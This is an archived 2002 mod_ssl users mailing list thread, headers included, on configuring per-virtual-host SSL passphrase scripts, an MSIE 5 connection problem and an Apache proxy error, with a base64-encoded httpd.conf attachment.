RAA26898; Tue, 5 Mar 2002 17:57:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from brunog.spinweb.net id RAA26878; Tue, 5 Mar 2002 17:56:26 +0100 (MET) Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146]) by brunog.spinweb.net (8.11.6) id g25GuN919257; Tue, 5 Mar 2002 16:56:24 GMT Message-ID: <3C84F8C1.2040709@xbridge.com> Date: Tue, 05 Mar 2002 16:56:33 +0000 From: Bruno Georges User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20010923 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-bugdb@modssl.org, modssl-users@modssl.org Subject: SSLPassPhraseDialog and VirtualHost Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bruno Georges X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I have a problem when trying to use the SSLPassPhraseDialog directive with "exec" It works ok with 1 virtual host / 1 password , but not with 2 or more The pp.out file just echo the password. Local httpd.conf shows: ---------------------------- # Pass Phrase Dialog: # #SSLPassPhraseDialog builtin SSLPassPhraseDialog exec:/content/ssl/pp/pp.out The password file pp.out with the 2 password for 2 vhost: -------------- #!/bin/bash echo "password1" echo "password2" I tried to startssl with 1 vhost, it works ok, but with 2 vhost , it shows the following error: ----------------------------------------------------------------------------------------------------------------------------------------------- [Tue Mar 5 12:48:50 2002] [error] mod_ssl: Init: Pass phrase incorrect (OpenSSL library error follows) [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D084069:asn1 encoding routines:d2i_ASN1_SET:bad tag [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09D082:asn1 encoding routines:d2i_RSAPrivateKey:parsing [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding routines:d2i_PrivateKey:ASN1 lib Any idea? Regards Bruno Georges ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 18:10:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA28872; Tue, 5 Mar 2002 18:09:48 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from gmk-smtp4.growmark.com id SAA28052; Tue, 5 Mar 2002 18:07:12 +0100 (MET) Received: FROM exchange-gmk.growmark2.com BY gmk-smtp4.growmark.com ; Tue Mar 05 11:06:48 2002 -0600 Received: by webmail.growmark2.com with Internet Mail Service (5.5.2653.19) id ; Tue, 5 Mar 2002 11:06:47 -0600 Message-ID: From: "Price, Gary" To: "'modssl-users@modssl.org'" Subject: RE: SSLPassPhraseDialog and VirtualHost Date: Tue, 5 Mar 2002 11:06:46 -0600 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Price, Gary" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You will need a separate pass phrase and script placed in each virtual host container. Gary -----Original Message----- From: Bruno Georges [mailto:bruno@xbridge.com] Sent: Tuesday, March 05, 2002 10:57 AM To: modssl-bugdb@modssl.org; modssl-users@modssl.org Subject: SSLPassPhraseDialog and VirtualHost Hi I have a problem when trying to use the SSLPassPhraseDialog directive with "exec" It works ok with 1 virtual host / 1 password , but not with 2 or more The pp.out file just echo the password. Local httpd.conf shows: ---------------------------- # Pass Phrase Dialog: # #SSLPassPhraseDialog builtin SSLPassPhraseDialog exec:/content/ssl/pp/pp.out The password file pp.out with the 2 password for 2 vhost: -------------- #!/bin/bash echo "password1" echo "password2" I tried to startssl with 1 vhost, it works ok, but with 2 vhost , it shows the following error: ---------------------------------------------------------------------------- ------------------------------------------------------------------- [Tue Mar 5 12:48:50 2002] [error] mod_ssl: Init: Pass phrase incorrect (OpenSSL library error follows) [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D084069:asn1 encoding routines:d2i_ASN1_SET:bad tag [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09D082:asn1 encoding routines:d2i_RSAPrivateKey:parsing [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding routines:d2i_PrivateKey:ASN1 lib Any idea? Regards Bruno Georges ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 18:21:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA29350; Tue, 5 Mar 2002 18:20:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mx1.petsmart.com id SAA29330; Tue, 5 Mar 2002 18:19:50 +0100 (MET) Received: from mail.petsmart.com (chip.pasa.petsmart.com [10.2.1.75]) by mx1.petsmart.com (8.11.1/8.11.1) with SMTP id g25HJmb02713 for ; Tue, 5 Mar 2002 09:19:48 -0800 Received: (qmail 4867 invoked by uid 104); 5 Mar 2002 17:19:48 -0000 Received: from sang@petsmart.com by mail; 05 Mar 2002 17:19:48 -0000 Received: from syi.pasa.petsmart.com (HELO syi) (shy2@10.2.1.171) by chip.pasa.petsmart.com with SMTP; 5 Mar 2002 17:19:46 -0000 Date: Tue, 5 Mar 2002 09:19:16 -0800 (PST) From: Sang Yi X-X-Sender: shy2@syi.pasa.petsmart.com To: "'modssl-users@modssl.org'" Subject: RE: SSLPassPhraseDialog and VirtualHost In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sang Yi X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users try something like this, a very simple sh script: #!/bin/sh PASS1=somepass1 PASS2=somepass2 case $1 in www.pass1.com:443) echo $PASS1;; www.pass2.com:443) echo $PASS2;; esac exit 0 without the exec, you'll see that apache requests a passphrase via stdin. the exec basically redirects the stdout from the script it runs at start. hope that helps. -sang On Tue, 5 Mar 2002, Price, Gary wrote: > You will need a separate pass phrase and script placed in each virtual host > container. > > Gary > > -----Original Message----- > From: Bruno Georges [mailto:bruno@xbridge.com] > Sent: Tuesday, March 05, 2002 10:57 AM > To: modssl-bugdb@modssl.org; modssl-users@modssl.org > Subject: SSLPassPhraseDialog and VirtualHost > > > Hi > I have a problem when trying to use the SSLPassPhraseDialog directive > with "exec" > It works ok with 1 virtual host / 1 password , but not with 2 or more > The pp.out file just echo the password. > > Local httpd.conf shows: > ---------------------------- > > # Pass Phrase Dialog: > # #SSLPassPhraseDialog builtin > SSLPassPhraseDialog exec:/content/ssl/pp/pp.out > > > The password file pp.out with the 2 password for 2 vhost: > -------------- > #!/bin/bash > echo "password1" > echo "password2" > > > I tried to startssl with 1 vhost, it works ok, but with 2 vhost , it > shows the following error: > ---------------------------------------------------------------------------- > ------------------------------------------------------------------- > > > [Tue Mar 5 12:48:50 2002] [error] mod_ssl: Init: Pass phrase incorrect > (OpenSSL library error follows) > [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D084069:asn1 encoding > routines:d2i_ASN1_SET:bad tag > [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09D082:asn1 encoding > routines:d2i_RSAPrivateKey:parsing > [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding > routines:d2i_PrivateKey:ASN1 lib > > Any idea? > > Regards > Bruno Georges > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 21:03:45 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA06581; Tue, 5 Mar 2002 21:02:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA06528; Tue, 5 Mar 2002 21:01:18 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 349CB4CE75E; Tue, 5 Mar 2002 21:01:12 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g25Jpud72200; Tue, 5 Mar 2002 20:51:56 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtpo.iconmulti.com id SAA28605; Tue, 5 Mar 2002 18:08:31 +0100 (MET) Received: from videoconference ([206.114.58.201]) by smtpo.iconmulti.com (8.11.3/8.9.3) with SMTP id fARJql202338 for ; Tue, 27 Nov 2001 14:52:48 -0500 (EST) From: "Adam Bultman" To: Subject: Help with Mod SSL and MSIE ~5 Date: Tue, 27 Nov 2001 14:49:13 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Adam Bultman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello. I've got a server running Apache with mod SSL. Certain MSIE users (version ~5.0) will not be able to connect to a web page. They can get to the root dir of the server (which throws a "forbidden" error) but not to the actual web page in a directory. To fix this, most people change their security settings from medium to medium-low, and then they can go about their business. However, others can't. I know there's a bug in MSIE 5.0~2919, or whatever, but will UGing to 6.0 fix this forever? I don't want to downgrade SSL or anything. Any help would be much appreciated. adam ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 21:03:50 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA06587; Tue, 5 Mar 2002 21:02:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA06526; Tue, 5 Mar 2002 21:01:16 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 0B3374CE759; Tue, 5 Mar 2002 21:01:12 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g25Jpj872188; Tue, 5 Mar 2002 20:51:45 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id RAA26893; Tue, 5 Mar 2002 17:57:09 +0100 (MET) Date: Tue, 5 Mar 2002 17:57:09 +0100 (MET) Message-Id: <200203051657.RAA26893@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] SSLPassPhraseDialog and VirtualHost (PR#668) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I have a problem when trying to use the SSLPassPhraseDialog directive with "exec" It works ok with 1 virtual host / 1 password , but not with 2 or more The pp.out file just echo the password. Local httpd.conf shows: ---------------------------- # Pass Phrase Dialog: # #SSLPassPhraseDialog builtin SSLPassPhraseDialog exec:/content/ssl/pp/pp.out The password file pp.out with the 2 password for 2 vhost: -------------- #!/bin/bash echo "password1" echo "password2" I tried to startssl with 1 vhost, it works ok, but with 2 vhost , it shows the following error: ----------------------------------------------------------------------------------------------------------------------------------------------- [Tue Mar 5 12:48:50 2002] [error] mod_ssl: Init: Pass phrase incorrect (OpenSSL library error follows) [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D084069:asn1 encoding routines:d2i_ASN1_SET:bad tag [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09D082:asn1 encoding routines:d2i_RSAPrivateKey:parsing [Tue Mar 5 12:48:50 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding routines:d2i_PrivateKey:ASN1 lib Any idea? Regards Bruno Georges ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 21:04:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA06623; Tue, 5 Mar 2002 21:03:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA06521; Tue, 5 Mar 2002 21:01:15 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id DC03D4CE755; Tue, 5 Mar 2002 21:01:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g25JpFR72164; Tue, 5 Mar 2002 20:51:15 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from oaukmh1.aberdeen.systems.cwplc.com id MAA10901; Tue, 5 Mar 2002 12:45:29 +0100 (MET) From: S.PANDEY@ponl.com Received: from Omnes-Aberdeen-pf2 by oaukmh1.aberdeen.systems.cwplc.com for modssl-users@modssl.org; Tue, 5 Mar 2002 11:45:57 Z Received: from mail pickup service by ponlmailscan1 with Microsoft SMTPSVC; Tue, 5 Mar 2002 11:41:59 +0000 Received: from gcseur.eur.ponl.com ([192.168.158.132]) by ponlmailscan1 with Microsoft SMTPSVC(5.0.2195.2966); Tue, 5 Mar 2002 11:41:57 +0000 X-Internal-ID: 3C7233A10009F4AF Received: from eur.ponl.com (192.168.158.132) by gcseur.eur.ponl.com (NPlex 2.0.123) for modssl-users@modssl.org; Tue, 5 Mar 2002 11:46:38 +0000 Message-Id: Date: Tue, 5 Mar 2002 11:46:00 0000 To: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_C5FDD_01C1C43A.C16BF6B0" Subject: Problems with mod ssl aware apavche server X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-OriginalArrivalTime: 05 Mar 2002 11:41:57.0406 (UTC) FILETIME=[C158E3E0:01C1C43A] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: S.PANDEY@ponl.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_C5FDD_01C1C43A.C16BF6B0 Content-Type: text/plain; charset="iso-8859-1" Content-ID: Content-Disposition: inline Content-Transfer-Encoding: 7bit Hi, Recently, I have installed the mod-ssl aware Apache server and I am able to access my secure and non-secure pages when I type the absolute URL for example https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/Hom ePage.html or http://qwfeeu21.poceur1:5580/products/corp/apps/ecs/Servlet?pathinfo=/gets/Entr y.html. But in many cases, in my application there is requirement to take the user on intermediate page first ( like customer sign on i.e https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/Cus tomerSignOn.html) and then after successfully logon it take the user to requested page (customer maintain screen i.e https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/Sec ureAccessReg.html) So, when I type the https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/Sec ureAccessReg.html in the address bar and press enter, after few second later browser display the following error Proxy Error The proxy server received an invalid response from an upstream server. The proxy server could not handle the request GET /products/corp/apps/gecs/Servlet. Reason: Document contains no data Apache/1.3.23 Server at qwfeeu21 Port 5543 Though the address bar show the https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/Cus tomerSignOn.html which is correct and it should display this page only. But it is strange that it is not displaying page. Though the same application working fine with the Apache-ssl without any problem At the server side I am getting the following error message [Mon Mar 4 13:42:43 2002] [debug] proxy_cache.c(984): No CacheRoot, so no cachi ng. Declining. [Mon Mar 4 13:42:52 2002] [debug] proxy_http.c(580): Content-Type: text/html [Mon Mar 4 13:42:52 2002] [debug] proxy_cache.c(984): No CacheRoot, so no cachi ng. Declining. [Mon Mar 4 13:49:00 2002] [debug] proxy_cache.c(984): No CacheRoot, so no cachi ng. Declining. Could you please advise me what is wrong here. Attached is the config file which I am using for your reference Thanks & Regards Santosh Pandey ------------------------------------------------------------------- The contents of this e-mail are confidential to the ordinary user of the e-mail address to which it was addressed and may also be privileged. If you are not the addressee of this e-mail you should not copy, forward, disclose or otherwise use it or any part of it in any form whatsoever. If you have received this e-mail in error please notify us by telephone or e-mail the sender by replying to this message, and then delete this e-mail and other copies of it from your computer system. Thank you. We reserve the right to monitor all e-mail communications through our network. ------=_NextPart_000_C5FDD_01C1C43A.C16BF6B0 Content-Type: application/octet-stream; name="httpsd~1.con" Content-ID: Content-Disposition: attachment; filename="httpsd~1.con" Content-Transfer-Encoding: base64 IyMKIyMgaHR0cGQuY29uZiAtLSBBcGFjaGUgSFRUUCBzZXJ2ZXIgY29uZmlndXJhdGlvbiBmaWxl CiMjCgojCiMgQmFzZWQgdXBvbiB0aGUgTkNTQSBzZXJ2ZXIgY29uZmlndXJhdGlvbiBmaWxlcyBv cmlnaW5hbGx5IGJ5IFJvYiBNY0Nvb2wuCiMKIyBUaGlzIGlzIHRoZSBtYWluIEFwYWNoZSBzZXJ2 ZXIgY29uZmlndXJhdGlvbiBmaWxlLiAgSXQgY29udGFpbnMgdGhlCiMgY29uZmlndXJhdGlvbiBk aXJlY3RpdmVzIHRoYXQgZ2l2ZSB0aGUgc2VydmVyIGl0cyBpbnN0cnVjdGlvbnMuCiMgU2VlIDxV Ukw6aHR0cDovL3d3dy5hcGFjaGUub3JnL2RvY3MvPiBmb3IgZGV0YWlsZWQgaW5mb3JtYXRpb24g YWJvdXQKIyB0aGUgZGlyZWN0aXZlcy4KIwojIERvIE5PVCBzaW1wbHkgcmVhZCB0aGUgaW5zdHJ1 Y3Rpb25zIGluIGhlcmUgd2l0aG91dCB1bmRlcnN0YW5kaW5nCiMgd2hhdCB0aGV5IGRvLiAgVGhl eSdyZSBoZXJlIG9ubHkgYXMgaGludHMgb3IgcmVtaW5kZXJzLiAgSWYgeW91IGFyZSB1bnN1cmUK IyBjb25zdWx0IHRoZSBvbmxpbmUgZG9jcy4gWW91IGhhdmUgYmVlbiB3YXJuZWQuICAKIwojIEFm dGVyIHRoaXMgZmlsZSBpcyBwcm9jZXNzZWQsIHRoZSBzZXJ2ZXIgd2lsbCBsb29rIGZvciBhbmQg cHJvY2VzcwojIC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvY29uZi9zcm0uY29uZiBhbmQg dGhlbiAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NvbmYvYWNjZXNzLmNvbmYKIyB1bmxl c3MgeW91IGhhdmUgb3ZlcnJpZGRlbiB0aGVzZSB3aXRoIFJlc291cmNlQ29uZmlnIGFuZC9vcgoj IEFjY2Vzc0NvbmZpZyBkaXJlY3RpdmVzIGhlcmUuCiMKIyBUaGUgY29uZmlndXJhdGlvbiBkaXJl Y3RpdmVzIGFyZSBncm91cGVkIGludG8gdGhyZWUgYmFzaWMgc2VjdGlvbnM6CiMgIDEuIERpcmVj dGl2ZXMgdGhhdCBjb250cm9sIHRoZSBvcGVyYXRpb24gb2YgdGhlIEFwYWNoZSBzZXJ2ZXIgcHJv Y2VzcyBhcyBhCiMgICAgIHdob2xlICh0aGUgJ2dsb2JhbCBlbnZpcm9ubWVudCcpLgojICAyLiBE aXJlY3RpdmVzIHRoYXQgZGVmaW5lIHRoZSBwYXJhbWV0ZXJzIG9mIHRoZSAnbWFpbicgb3IgJ2Rl ZmF1bHQnIHNlcnZlciwKIyAgICAgd2hpY2ggcmVzcG9uZHMgdG8gcmVxdWVzdHMgdGhhdCBhcmVu J3QgaGFuZGxlZCBieSBhIHZpcnR1YWwgaG9zdC4KIyAgICAgVGhlc2UgZGlyZWN0aXZlcyBhbHNv IHByb3ZpZGUgZGVmYXVsdCB2YWx1ZXMgZm9yIHRoZSBzZXR0aW5ncwojICAgICBvZiBhbGwgdmly dHVhbCBob3N0cy4KIyAgMy4gU2V0dGluZ3MgZm9yIHZpcnR1YWwgaG9zdHMsIHdoaWNoIGFsbG93 IFdlYiByZXF1ZXN0cyB0byBiZSBzZW50IHRvCiMgICAgIGRpZmZlcmVudCBJUCBhZGRyZXNzZXMg b3IgaG9zdG5hbWVzIGFuZCBoYXZlIHRoZW0gaGFuZGxlZCBieSB0aGUKIyAgICAgc2FtZSBBcGFj aGUgc2VydmVyIHByb2Nlc3MuCiMKIyBDb25maWd1cmF0aW9uIGFuZCBsb2dmaWxlIG5hbWVzOiBJ ZiB0aGUgZmlsZW5hbWVzIHlvdSBzcGVjaWZ5IGZvciBtYW55CiMgb2YgdGhlIHNlcnZlcidzIGNv bnRyb2wgZmlsZXMgYmVnaW4gd2l0aCAiLyIgKG9yICJkcml2ZTovIiBmb3IgV2luMzIpLCB0aGUK IyBzZXJ2ZXIgd2lsbCB1c2UgdGhhdCBleHBsaWNpdCBwYXRoLiAgSWYgdGhlIGZpbGVuYW1lcyBk byAqbm90KiBiZWdpbgojIHdpdGggIi8iLCB0aGUgdmFsdWUgb2YgU2VydmVyUm9vdCBpcyBwcmVw ZW5kZWQgLS0gc28gImxvZ3MvZm9vLmxvZyIKIyB3aXRoIFNlcnZlclJvb3Qgc2V0IHRvICIvdXNy L2xvY2FsL2FwYWNoZSIgd2lsbCBiZSBpbnRlcnByZXRlZCBieSB0aGUKIyBzZXJ2ZXIgYXMgIi91 c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZm9vLmxvZyIuCiMKCiMjIyBTZWN0aW9uIDE6IEdsb2JhbCBF bnZpcm9ubWVudAojCiMgVGhlIGRpcmVjdGl2ZXMgaW4gdGhpcyBzZWN0aW9uIGFmZmVjdCB0aGUg b3ZlcmFsbCBvcGVyYXRpb24gb2YgQXBhY2hlLAojIHN1Y2ggYXMgdGhlIG51bWJlciBvZiBjb25j dXJyZW50IHJlcXVlc3RzIGl0IGNhbiBoYW5kbGUgb3Igd2hlcmUgaXQKIyBjYW4gZmluZCBpdHMg Y29uZmlndXJhdGlvbiBmaWxlcy4KIwoKIwojIFNlcnZlclR5cGUgaXMgZWl0aGVyIGluZXRkLCBv ciBzdGFuZGFsb25lLiAgSW5ldGQgbW9kZSBpcyBvbmx5IHN1cHBvcnRlZCBvbgojIFVuaXggcGxh dGZvcm1zLgojClNlcnZlclR5cGUgc3RhbmRhbG9uZQoKIwojIFNlcnZlclJvb3Q6IFRoZSB0b3Ag b2YgdGhlIGRpcmVjdG9yeSB0cmVlIHVuZGVyIHdoaWNoIHRoZSBzZXJ2ZXIncwojIGNvbmZpZ3Vy YXRpb24sIGVycm9yLCBhbmQgbG9nIGZpbGVzIGFyZSBrZXB0LgojCiMgTk9URSEgIElmIHlvdSBp bnRlbmQgdG8gcGxhY2UgdGhpcyBvbiBhbiBORlMgKG9yIG90aGVyd2lzZSBuZXR3b3JrKQojIG1v dW50ZWQgZmlsZXN5c3RlbSB0aGVuIHBsZWFzZSByZWFkIHRoZSBMb2NrRmlsZSBkb2N1bWVudGF0 aW9uCiMgKGF2YWlsYWJsZSBhdCA8VVJMOmh0dHA6Ly93d3cuYXBhY2hlLm9yZy9kb2NzL21vZC9j b3JlLmh0bWwjbG9ja2ZpbGU+KTsKIyB5b3Ugd2lsbCBzYXZlIHlvdXJzZWxmIGEgbG90IG9mIHRy b3VibGUuCiMKU2VydmVyUm9vdCAiL3RldXIvY3JlL2FwYWV1MTEvd3d3L2FwYWNoZSIKCiMKIyBU aGUgTG9ja0ZpbGUgZGlyZWN0aXZlIHNldHMgdGhlIHBhdGggdG8gdGhlIGxvY2tmaWxlIHVzZWQg d2hlbiBBcGFjaGUKIyBpcyBjb21waWxlZCB3aXRoIGVpdGhlciBVU0VfRkNOVExfU0VSSUFMSVpF RF9BQ0NFUFQgb3IKIyBVU0VfRkxPQ0tfU0VSSUFMSVpFRF9BQ0NFUFQuIFRoaXMgZGlyZWN0aXZl IHNob3VsZCBub3JtYWxseSBiZSBsZWZ0IGF0CiMgaXRzIGRlZmF1bHQgdmFsdWUuIFRoZSBtYWlu IHJlYXNvbiBmb3IgY2hhbmdpbmcgaXQgaXMgaWYgdGhlIGxvZ3MKIyBkaXJlY3RvcnkgaXMgTkZT IG1vdW50ZWQsIHNpbmNlIHRoZSBsb2NrZmlsZSBNVVNUIEJFIFNUT1JFRCBPTiBBIExPQ0FMCiMg RElTSy4gVGhlIFBJRCBvZiB0aGUgbWFpbiBzZXJ2ZXIgcHJvY2VzcyBpcyBhdXRvbWF0aWNhbGx5 IGFwcGVuZGVkIHRvCiMgdGhlIGZpbGVuYW1lLiAKIwojTG9ja0ZpbGUgL3RldXIvY3JlL2FwYWV1 MTEvd3d3L2FwYWNoZS9sb2dzL2h0dHBkLmxvY2sKCiMKIyBQaWRGaWxlOiBUaGUgZmlsZSBpbiB3 aGljaCB0aGUgc2VydmVyIHNob3VsZCByZWNvcmQgaXRzIHByb2Nlc3MKIyBpZGVudGlmaWNhdGlv biBudW1iZXIgd2hlbiBpdCBzdGFydHMuCiMKUGlkRmlsZSAvdGV1ci9jcmUvYXBhZXUxMS93d3cv YXBhY2hlL2xvZ3MvaHR0cGQucGlkCgojCiMgU2NvcmVCb2FyZEZpbGU6IEZpbGUgdXNlZCB0byBz dG9yZSBpbnRlcm5hbCBzZXJ2ZXIgcHJvY2VzcyBpbmZvcm1hdGlvbi4KIyBOb3QgYWxsIGFyY2hp dGVjdHVyZXMgcmVxdWlyZSB0aGlzLiAgQnV0IGlmIHlvdXJzIGRvZXMgKHlvdSdsbCBrbm93IGJl Y2F1c2UKIyB0aGlzIGZpbGUgd2lsbCBiZSAgY3JlYXRlZCB3aGVuIHlvdSBydW4gQXBhY2hlKSB0 aGVuIHlvdSAqbXVzdCogZW5zdXJlIHRoYXQKIyBubyB0d28gaW52b2NhdGlvbnMgb2YgQXBhY2hl IHNoYXJlIHRoZSBzYW1lIHNjb3JlYm9hcmQgZmlsZS4KIwpTY29yZUJvYXJkRmlsZSAvdGV1ci9j cmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3MvaHR0cGQuc2NvcmVib2FyZAoKIwojIEluIHRoZSBz dGFuZGFyZCBjb25maWd1cmF0aW9uLCB0aGUgc2VydmVyIHdpbGwgcHJvY2VzcyBodHRwZC5jb25m ICh0aGlzIAojIGZpbGUsIHNwZWNpZmllZCBieSB0aGUgLWYgY29tbWFuZCBsaW5lIG9wdGlvbiks IHNybS5jb25mLCBhbmQgYWNjZXNzLmNvbmYgCiMgaW4gdGhhdCBvcmRlci4gIFRoZSBsYXR0ZXIg dHdvIGZpbGVzIGFyZSBub3cgZGlzdHJpYnV0ZWQgZW1wdHksIGFzIGl0IGlzIAojIHJlY29tbWVu ZGVkIHRoYXQgYWxsIGRpcmVjdGl2ZXMgYmUga2VwdCBpbiBhIHNpbmdsZSBmaWxlIGZvciBzaW1w bGljaXR5LiAgCiMgVGhlIGNvbW1lbnRlZC1vdXQgdmFsdWVzIGJlbG93IGFyZSB0aGUgYnVpbHQt aW4gZGVmYXVsdHMuICBZb3UgY2FuIGhhdmUgdGhlIAojIHNlcnZlciBpZ25vcmUgdGhlc2UgZmls ZXMgYWx0b2dldGhlciBieSB1c2luZyAiL2Rldi9udWxsIiAoZm9yIFVuaXgpIG9yCiMgIm51bCIg KGZvciBXaW4zMikgZm9yIHRoZSBhcmd1bWVudHMgdG8gdGhlIGRpcmVjdGl2ZXMuCiMKI1Jlc291 cmNlQ29uZmlnIGNvbmYvc3JtLmNvbmYKI0FjY2Vzc0NvbmZpZyBjb25mL2FjY2Vzcy5jb25mCgoj CiMgVGltZW91dDogVGhlIG51bWJlciBvZiBzZWNvbmRzIGJlZm9yZSByZWNlaXZlcyBhbmQgc2Vu ZHMgdGltZSBvdXQuCiMKVGltZW91dCAzMDAKCiMKIyBLZWVwQWxpdmU6IFdoZXRoZXIgb3Igbm90 IHRvIGFsbG93IHBlcnNpc3RlbnQgY29ubmVjdGlvbnMgKG1vcmUgdGhhbgojIG9uZSByZXF1ZXN0 IHBlciBjb25uZWN0aW9uKS4gU2V0IHRvICJPZmYiIHRvIGRlYWN0aXZhdGUuCiMKS2VlcEFsaXZl IE9uCgojCiMgTWF4S2VlcEFsaXZlUmVxdWVzdHM6IFRoZSBtYXhpbXVtIG51bWJlciBvZiByZXF1 ZXN0cyB0byBhbGxvdwojIGR1cmluZyBhIHBlcnNpc3RlbnQgY29ubmVjdGlvbi4gU2V0IHRvIDAg dG8gYWxsb3cgYW4gdW5saW1pdGVkIGFtb3VudC4KIyBXZSByZWNvbW1lbmQgeW91IGxlYXZlIHRo aXMgbnVtYmVyIGhpZ2gsIGZvciBtYXhpbXVtIHBlcmZvcm1hbmNlLgojCk1heEtlZXBBbGl2ZVJl 